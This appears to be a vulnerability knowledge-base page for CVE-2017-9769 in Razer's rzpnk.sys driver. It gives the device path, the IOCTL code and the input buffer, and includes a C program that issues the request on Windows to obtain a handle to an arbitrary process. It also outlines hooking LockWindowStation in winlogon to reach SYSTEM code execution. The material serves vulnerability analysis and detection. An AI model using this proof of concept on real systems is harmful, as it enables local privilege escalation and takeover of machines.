Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network

CVE-2017-9769

Disclosure Date: August 02, 2017

Description

A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.

Technical Analysis

Analysis

The Razer rzpnk.sys driver exposes a device, \\.\47CD78C9-64C3-47C2-B80F-677B887CF095, that any local user can use to open a handle to an arbitrary process. The user opens a handle to this device and issues NtDeviceIoControlFile with IOCTL 0x22a050 to reach the vulnerable code path. The input buffer passed to the driver is the target PID followed by 0, packed as two QWORD values (buffer = [pid, 0].pack('QQ')). This ultimately leads to a call to ZwOpenProcess rather than NtOpenProcess. Because the Zw variant is invoked from kernel mode, the request is treated as originating in kernel mode and the object manager's access check against the target process is skipped, so the caller receives a handle to a process it would otherwise have no right to open.
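
The following C program is an added example and is not code from the AttackerKB page, Rapid7 or Razer. It decodes IOCTL 0x22a050 into its CTL_CODE fields (which shows, among other things, that the IOCTL requires write access on the device handle) and builds the 16-byte [pid, 0] input buffer described above; on Windows it also issues that request through ntdll!NtDeviceIoControlFile. The page does not say how the driver returns the opened handle, so the example assumes it comes back as a QWORD in the output buffer; that assumption is marked in the code.

```c
/*
 * Added example, not code from the AttackerKB page, Rapid7 or Razer.
 * Decodes IOCTL 0x22a050 into its CTL_CODE fields and builds the 16-byte
 * METHOD_BUFFERED input ([pid, 0] as two little-endian QWORDs) described
 * in the analysis.  The _WIN32 section issues that request to the device
 * through ntdll!NtDeviceIoControlFile; elsewhere only the decoder and
 * packer compile.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define RZPNK_DEVICE_PATH "\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095"
#define RZPNK_IOCTL_OPEN_PROCESS 0x22a050u

/* Windows CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
struct ioctl_fields {
    uint32_t device_type;   /* 0x22 = FILE_DEVICE_UNKNOWN */
    uint32_t access;        /* 0 ANY, 1 FILE_READ_ACCESS, 2 FILE_WRITE_ACCESS */
    uint32_t function;      /* driver-defined function number */
    uint32_t method;        /* 0 = METHOD_BUFFERED */
};

struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = code >> 16;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2) & 0xfffu;
    f.method      = code & 0x3u;
    return f;
}

/* Equivalent of Ruby's [pid, 0].pack('QQ'): two little-endian 64-bit words. */
size_t build_open_process_request(uint64_t pid, uint8_t out[16])
{
    uint64_t words[2] = { pid, 0 };
    for (int w = 0; w < 2; w++)
        for (int b = 0; b < 8; b++)
            out[w * 8 + b] = (uint8_t)(words[w] >> (8 * b));
    return 16;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtDeviceIoControlFile_t)(HANDLE, HANDLE, PIO_APC_ROUTINE,
        PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);

/* Ask rzpnk.sys for a handle to `pid`.  The decoded access field is
 * FILE_WRITE_ACCESS, so the device must be opened with write access.
 * ASSUMPTION (not stated on the page): the handle comes back as a QWORD
 * in the output buffer. */
static HANDLE razer_open_process(uint64_t pid)
{
    HANDLE dev = CreateFileA(RZPNK_DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                             OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE)
        return NULL;
    NtDeviceIoControlFile_t ioctl = (NtDeviceIoControlFile_t)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), "NtDeviceIoControlFile");
    uint8_t in[16];
    uint64_t out = 0;
    IO_STATUS_BLOCK iosb;
    build_open_process_request(pid, in);
    NTSTATUS st = ioctl(dev, NULL, NULL, NULL, &iosb, RZPNK_IOCTL_OPEN_PROCESS,
                        in, sizeof in, &out, sizeof out);
    CloseHandle(dev);
    return st >= 0 ? (HANDLE)(uintptr_t)out : NULL;
}
#endif

int main(int argc, char **argv)
{
    uint64_t pid = argc > 1 ? strtoull(argv[1], NULL, 0) : 4; /* 4 = System */
    struct ioctl_fields f = decode_ioctl(RZPNK_IOCTL_OPEN_PROCESS);
    uint8_t buf[16];

    printf("IOCTL 0x%x: device_type=0x%x access=%u function=0x%x method=%u\n",
           RZPNK_IOCTL_OPEN_PROCESS, f.device_type, f.access, f.function, f.method);
    build_open_process_request(pid, buf);
    printf("input buffer:");
    for (int i = 0; i < 16; i++)
        printf(" %02x", buf[i]);
    putchar('\n');
#ifdef _WIN32
    HANDLE h = razer_open_process(pid);
    printf("handle to PID %llu: %p\n", (unsigned long long)pid, h);
    if (h)
        CloseHandle(h);
#endif
    return 0;
}
```

Running the decoder alone is useful even without the driver: it tells you the request is METHOD_BUFFERED with FILE_WRITE_ACCESS on FILE_DEVICE_UNKNOWN, which is the shape to look for when reviewing this driver's dispatch routine or when writing detection around unexpected writes to that device object.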

To gain code execution from this vulnerability, the user32!LockWindowStation function can be hooked within the winlogon process. This process and function are ideal targets because winlogon runs as NT AUTHORITY\SYSTEM and the function can be invoked on demand. As a by-product of exploiting this, the screen will be locked, which may tip off an observant user who is interacting with the system at the time of exploitation.

Exploitation of this vulnerability is quite reliable, as it does not rely on memory corruption: the driver simply hands the caller a process handle. Note that the attacker must already be able to run code on the host in order to open the device, so in practice this is a local privilege escalation regardless of the network attack vector recorded in the CVSS metrics below.

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High
